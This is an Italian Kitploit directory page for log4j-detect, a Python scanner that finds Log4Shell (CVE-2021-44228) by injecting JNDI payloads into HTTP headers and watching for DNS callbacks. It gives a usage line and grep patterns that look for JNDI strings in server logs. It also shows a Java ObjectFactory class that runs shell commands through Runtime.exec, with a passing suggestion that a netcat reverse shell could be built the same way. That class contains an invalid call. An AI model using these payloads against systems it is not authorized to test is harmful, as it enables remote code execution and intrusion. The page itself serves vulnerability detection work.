Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j — Scanner multithread in Python che rileva Log4Shell (CVE-2021-44228) inviando richieste HTTP appositamente costruite con payload JNDI e monitorando i callback DNS per identificare gli host vulnerabili. | Kitploit
Strumenti/GitHubGitHub/hassaanahmad813/log4j
Scanner di VulnerabilitàExploitRaccolta InformazioniSicurezza WebAnalisi DNS
GitHubhassaanahmad813/log4j

log4j

Scanner multithread in Python che rileva Log4Shell (CVE-2021-44228) inviando richieste HTTP appositamente costruite con payload JNDI e monitorando i callback DNS per identificare gli host vulnerabili.

Vedi Repository
64 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4j-detect

Semplice script Python 3 per rilevare la vulnerabilità della libreria Java "Log4j" (CVE-2021-44228) per un elenco di URL con multithreading

Questo script è basato su takito1812/log4j-detect

Di ExodataCyberdefense


Lo script "log4j-detect.py" sviluppato in Python 3 è responsabile del rilevamento se un elenco di URL è vulnerabile a CVE-2021-44228.

Per fare ciò, invia una richiesta GET utilizzando thread (prestazioni più elevate) a ciascuno degli URL nell'elenco specificato. La richiesta GET contiene un payload che, in caso di successo, restituisce una richiesta DNS a Burp Collaborator / interactsh. Questo payload viene inviato in un parametro di test e nelle intestazioni "User-Agent" / "Referer" / "X-Forwarded-For" / "Authentication". Infine, se un host è vulnerabile, un numero di identificazione apparirà nel prefisso del sottodominio del payload Burp Collaborator / interactsh e nell'output dello script, consentendo di sapere quale host ha risposto tramite DNS.

Va notato che questo script gestisce solo il rilevamento DNS della vulnerabilità e non testa l'esecuzione remota di comandi.

Esecuzione di log4j-detect.py

root@kitploit:~
python3 log4j-detect.py -s <burpCollaborator/interactsh...> [-u [urls]] [-f [urlFileList]] [-t THREADS] [-p PROXY] [--urllib3-warnings|--no-urllib3-warnings]

imagen

Se hai accesso diretto al server puoi eseguire:

root@kitploit:~
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[
s]?|rmi)://[^\n]+'

Per verificare se qualcuno ha tentato di effettuare una connessione tramite un server ldap

Se lo script rileva una vulnerabilità

Ecco un esempio di codice che puoi lanciare per testare se il tuo server può essere compromesso (Se è una shell Windows puoi semplicemente usare la sintassi di PowerShell)

root@kitploit:~
public class ExportObject implements javax.naming.spi.ObjectFactory {
	public ExportObject() {
		try {
			java.lang.getRuntime().exec("touch ~/pwned");
			java.lang.getRuntime().exec("ls ~");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

Qualcosa di simile potrebbe permetterti di creare una reverse shell con il comando nc

Scarica lo strumento